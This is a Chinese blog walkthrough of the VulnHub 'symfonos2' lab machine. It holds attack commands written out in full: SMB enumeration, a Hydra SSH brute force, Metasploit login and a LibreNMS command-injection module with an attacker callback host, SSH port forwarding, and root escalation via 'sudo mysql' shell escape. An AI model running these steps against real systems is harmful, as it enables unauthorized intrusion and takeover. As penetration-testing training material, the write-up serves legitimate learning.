symfonos2

最新推荐文章于 2024-08-27 16:29:55 发布
最新推荐文章于 2024-08-27 16:29:55 发布
阅读量223 收藏 1
点赞数 1
文章标签: android 网络 安全 测试工具 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/141221890
版权

一、主机发现

二、信息收集

1.查看共享文件

smbclient -L 192.168.7.198
空密码

查看anonymous文件

smbclient //192.168.7.198/anonymous
空密码

2.下载log.txt文件

get log.txt
more log.txt //查看文件

发现aeolus用户

3.使用九头蛇爆破,,爆出密码sergioteamo

hydra -l aeolus -P 1.txt ssh://192.168.7.198

4.ssh进行连接

ssh aeolus@192.168.7.198
sergioteamo //密码

5.尝试sudo -l,有限制

三、信息利用

1.使用msf进行ssh登录

msfconsole
search ssh_login

2.使用脚本

use 0 //使用第一个
show options //查看配置

配置需要的参数

set rhosts 192.168.7.198
set username aeolus
set password sergioteamo
run

3.查看sessions

将 sessions 会话升级为一个 meterpreter 会话,使用新会话

sessions -u 1
sessions 2

4.查看网络相关信息

8080端口仅对自己开放,要进行端口转发

5.将攻击机的7788端口映射到靶机的8080端口

ssh -Nf -L 7894:127.0.0.1:8080 aeolus@192.168.7.198
netstat -tulp

6.访问本地7894端口,发现使用的是libreNMS

7.找历史漏洞

search libreNMS

使用第二个,配置参数

use 1
set password sergioteamo
set rhosts 127.0.0.1
set rport 7894
set username aeolus
set lhost 192.168.7.211 //这里是攻击机的ip
run

四、提权

1.获得交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

2.查看执行权限,sudo可以执行mysql,执行语句,提权成功

sudo -l
sudo mysql -e '\! /bin/sh'

蓝天模糊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
symfonos 2
墨痕诉清风的博客
04-29 952
到目前为止,我们已经得到了一个用户名aeolus,所以我们试图用hydra暴力破解它,经过长时间的等待,我们成功地得到了一个密码sergiotaemo。由于端口80是打开的,我们试图在浏览器中打开IP地址,但在网页上没有找到任何有用的信息。之后,我们能够访问在端口8080上运行的Web服务。为了证实我们的发现,我们在smbclient的帮助下使用空密码列出目标机器的共享资源,并得到了相同的结果。我们在Metasploit中搜索了LibreNMS应用程序可用的任何漏洞,并发现了一个可用的命令注入漏洞。
OSCP - symfonos2 writeup
Jiajiajiang_的博客
04-27 502
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/symfonos/symfonos2.7z 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover nmap SMB 尝试使用SMB服务,使用anonymous用户登录, 有一个log.txt的文件,下载下来 读文件,发现shad...
symfonos2 靶机
m0_62202418的博客
11-28 952
ssh -Nf -L 8888:127.0.0.1:8080 aeolus@10.1.1.147 将本地机器的8888端口映射到远程机器的127.0.0.1的8080端口 执行此命令后,本地机器的8888端口将被转发到远程机器的8080端口。知道了账号密码,那就使用msf 工具进行SSH登录启动metasploit 工具。靶机开放了21、22、80、139、445端口。将本地的9999端口映射到靶机的8080端口。使用爆破出来的账密进行ssh 登录。发现了一个叫aeolus 的用户。
Vulnhub靶机 Symfonos 2
菜浪马废的博客
09-25 408
扫出用户名aeolus aeolus:sergioteamo 用来登录ssh试试 转发8080端口 提权成功 先是enum4linux找到用户名 ftp爆破 发现可以用来登录ssh 找到运行的8080端口 ssh端口转发 访问后发现是cms 找到漏洞 得到下一个用户权限 sudo -l找到mysql gtfobins上找到提权方法 得到root权限 ...
symfonos2靶机
hqy250019的博客
08-13 410
使用 msf 工具进行 ssh 登录,使用 metasploit 工具,查找 ssh 登录模块。查看 anonymous 文件夹,在 backups 目录下发现 log.txt 文件。发现网站使用的是libreNMS 系统,使用 msf 查看一下该系统是否存在漏洞。下载此文件查看,发现一个 aeolus 用户,在本地目录下打开。进行端口转发,将本地的9999端口映射到靶机的8080端口。发现两个命令执行漏洞,使用第二个,查看一下需要设置的选项。使用第一个,看一下需要配置的选项。升级会话,使用新会话。
symfonos2 打靶渗透
m0_65112983的博客
08-05 535
symfonos2 打靶渗透
学习笔记-symfonos2-WalkThrough
人饭子的博客
11-04 207
symfonos2-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 靶机地址 https://www.vulnhub.com/entry/symfonos-2,331/ Description OSCP-like Intermediate real life based machine designe...
symfonos2靶机-Walkthrough
ins1ght的博客
09-07 1751
symfonos2靶机展开的一次“渗透测试”。你可以看到一只菜鸟的个人思路、对网上已有Writeup的复现以及中间遇到的一些问题。
【Vulnhub】之Symfonos2
zg_111的博客
04-20 665
80端口暂时没有发现可利用点,前面nmap扫描发现靶机还开放了smb端口,所以我们使用smbclient工具列出靶机的共享文件夹。发现anonymous共享文件夹,我们使用smbclient打开发现在backups文件夹下有一个log.txt。发现比之前信息收集到的端口多了3306和8080端口,在kali中尝试访问8080无法访问。前面我们在log.txt中拿到用户aeolus,我们使用hydra工具尝试爆破用户密码。刚才信息收集发现靶机开放了22端口,我们使用爆破出来的账密尝试ssh登录。
SYMFONOS3.1:Desarrollo del CTF SYMFONOS 3.1
04-05
2.埃斯卡尼奥·德波多斯 nmap -n -P0 -p- -sC -sV -O -T5 -oA full 10.10.10.153 Nmap scan report for 10.10.10.153 Host is up (0.00047s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21...
SYMFONOS4:CTF SYMFONOS4的开发
04-08
2.埃斯卡尼奥·德波多斯 # Nmap 7.91 scan initiated Sun Apr 4 17:41:16 2021 as: nmap -n -P0 -p- -sS -sC -sV -vv -T5 -oA full 192.168.1.136 Nmap scan report for 192.168.1.136 Host is up, received arp-...
一道关于php文件包含的CTF题
最新发布
m0_62903168的博客
08-27 1724
这是index.php的页面。点击login后会发现url里多了action的参数,那么我们就可以通过它来获取源码。?再通过base64的解码可以查看源码。
Android 应用中广播权限未指定风险与解决方案
weixin_37600397的博客
08-23 1566
Android应用中,广播(Broadcast)是一种重要的通信机制,应用可以通过广播与系统或其他应用进行通信。然而,如果在发送广播时未指定接收者的权限,可能会导致应用暴露于安全风险之下。未授权的接收者可能会拦截这些广播,甚至可能执行恶意操作。 在安全检查中,发现了一个问题:应用存在“Receiver权限未指定风险”。这个问题主要涉及广播发送时未指定接收者权限,可能导致广播被未授权的应用接收,进而可能造成数据泄露或其他安全问题。
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 1036
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
Android 关于设备定屏/黑屏/冻屏/ANR那些事
sinat_37429535的博客
08-23 1052
再去上报至WMS进行窗口状态的切换,避免主Surface绘制完成上报至WMS后、同时SurfaceView迟迟没有绘制完成使得startingWindow过早移除从而产生黑屏的现象.主要作用为提供ViewRootImpl与SurfaceView(假如窗口存在SurfaceView的情况下)同步服务,实现在主Surface与SurfaceView均完成绘制时,现象分析:桌面的状态时黑屏的,但是SystemUI的statusBar是显示和功能都是正常的,那一般就是当前app的问题了.
Android中apk安装过程源码解析
k663514387的博客
08-25 1472
android apk安装流程源码解析
Android调整进程的oom_adj
zoujin6649的博客
08-22 684
LinuxKernel中的OOM Killer,内核所管理的进程都有一个衡量其oom权重的值,存储在/proc/<PID>/oom_adj中。比如oom_score分数越低的进程,被杀死的概率越小,或者说被杀死的时间越晚。对于某些非常重要的应用程序,我们不希望它们被系统杀死,一个最简单的方法就是在它的AndroidManifest.xml文件中给“application”标签添加“android:persistent=true”属性。Android系统也为此开发了一个专门的驱动,名为。
[Android常见View的用法] RecyleView基本用法
studyForMokey的博客
08-25 713
RecycleView基本写法
安卓中 onClick(View v) 方法在主线程还是子线程运行
qq_33386162的博客
08-23 412
方法内执行了耗时的操作(如网络请求、大量数据处理等),这可能会导致主线程阻塞,进而影响用户体验(如界面卡顿、无响应等)。为了避免这种情况,你应该将这些耗时的操作放在子线程中执行,然后通过Handler或其他机制将结果传回主线程来更新UI。这个方法是在用户与界面元素(如按钮)进行交互时,由系统框架自动调用的。由于Android的UI操作必须是线程安全的,并且只能在主线程上进行,因此任何与UI相关的回调(包括。方法模拟了一个耗时的操作,我们通过在子线程中调用它来避免阻塞主线程。来处理跨线程的消息传递,因为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值